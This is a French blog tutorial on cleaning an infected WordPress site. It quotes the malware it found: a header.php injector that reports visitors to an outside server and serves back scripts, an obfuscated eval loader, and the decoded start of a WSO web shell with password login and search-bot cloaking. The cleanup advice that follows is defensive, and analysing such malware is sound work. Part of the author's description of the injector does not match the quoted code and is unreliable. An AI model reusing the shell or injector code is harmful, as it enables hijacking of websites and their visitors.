Supprimer le virus PHP WordPress

par

Publié par
0

Supprimer le virus PHP WordPress

Antivirus & Sécurité, Tutoriels et Nouvelles IT, WordPress

Supprimer le virus PHP WordPress

Publié par auteur-avatar
0
Supprimer le virus PHP WordPress

Ce tutoriel présente un cas particulier où un blog WordPress a été infecté. Supprimez le virus PHP WordPress.

L’autre jour, j’ai remarqué un code suspect qui semble être un virus PHP pour WordPress. Le code PHP suivant était présent dans le header.php, avant la ligne </head>.

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

Il s'agit d'un code PHP qui semble essayer de récupérer le contenu d'une ressource à partir d'un serveur externe, mais la partie qui fait référence à l'URL est incomplète.

Le mécanisme de fonctionnement est un peu plus complexe et rend ce virus WordPress PHP invisible pour les visiteurs des sites concernés. Au lieu de cela, il cible les moteurs de recherche (Google) et entraîne implicitement une diminution significative du nombre de visiteurs sur les sites Web concernés.

Détails du malware WordPress PHP Virus

1. Le code ci-dessus est présent dans header.php.

2. Un fichier est apparu sur le serveur wp-log.php dans le dossier wp-includes.

3 et 3 wp-log.php contient un code crypté, mais qui est relativement facile à décrypter.

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>

Décrypter le code malveillant de wp-log.php :

<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("
<pre align=center-->

<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) &amp;&amp; (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

Cela semble être un script PHP malveillant qui contient du code pour gérer l'authentification et les actions sur les fichiers et répertoires d'un serveur. On voit très facilement que ce script contient des variables comme $auth_pass (mot de passe d'authentification), $default_action (l'action par défaut), $default_use_ajax (en utilisant Ajax par défaut) et $default_charset (paramètre de caractère par défaut).

Évidemment, ce script comporte une section qui vérifie les agents utilisateurs HTTP pour bloquer l'accès à certains robots Web, tels que les moteurs de recherche. Il comporte également une section qui vérifie le mode de sécurité PHP et définit certains répertoires de travail.

4. Si wp-log.php est accédé dans le navigateur, une page Web apparaît avec un champ de authentification. À première vue, il semble s'agir d'un gestionnaire de fichiers grâce auquel de nouveaux fichiers peuvent être facilement téléchargés sur le serveur cible.

Avez-vous de virus un site Web WordPress?

Toujours, le processus de suppression manuelle des virus implique d’abord de découvrir et de comprendre quelle était la vulnérabilité.

1. Générez une sauvegarde pour l'ensemble du site Web. Cela doit inclure à la fois les fichiers et la base de données.

2. Déterminez approximativement depuis combien de temps le virus existe et recherchez sur le serveur Web les fichiers modifiés ou nouvellement créés dans le délai approximatif.

Par exemple, si vous souhaitez voir les fichiers .php créé ou modifié la semaine dernière, exécutez la commande sur le serveur : 

find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"

Il s’agit d’une méthode simple par laquelle vous pouvez découvrir les fichiers WordPress infectés et ceux contenant du code malveillant.

3. Vérifiez le fichier .htaccess de directives suspectes. Autorisations ou lignes d'exécution de script.

4. Vérifiez la base de données. Il est très possible que certains articles et pages WordPress aient été modifiés avec des logiciels malveillants ou que de nouveaux soient ajoutés. utilisateurs avec rôle d'administrateur.

5. Vérifiez les autorisations d'écriture pour les dossiers et les fichiers. chmod et chown.

Les autorisations recommandées sont : 644 pour les fichiers et 755 pour les répertoires.

find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;

6. Tout mettre à jour WordPress Plugins / WordPress Themes.

Liens : Fix Redirect WordPress Hack 2023 (Redirection du virus)

Ce sont des méthodes “basique” grâce auquel vous pouvez déviruser un site Web/blog WordPress. Si vous rencontrez des problèmes et avez besoin d'aide, la section commentaires est ouverte.

Supprimer le virus PHP WordPress

Antivirus & Sécurité, Tutoriels et Nouvelles IT, WordPress
Plus récent
Télécharger Opéra 12.02 – Sécurité et performances
Retour à la liste
Plus vieux Supprimer ou désinstaller ModSecurity (mod_security)
auteur-avatar

À propos Stealth

Passionné de technologie, j'écris avec plaisir sur StealthSettings.com depuis l'année 2006. J'ai une vaste expérience des systèmes d'exploitation : macOS, Windows et Linux, ainsi que des langages de programmation et des plateformes de blogging (WordPress) et pour les boutiques en ligne (WooCommerce, Magento, PrestaShop).

Vous pourriez également être intéressé par...

Laisser une réponse

Votre adresse email ne sera pas publiée. Les champs requis sont marqués *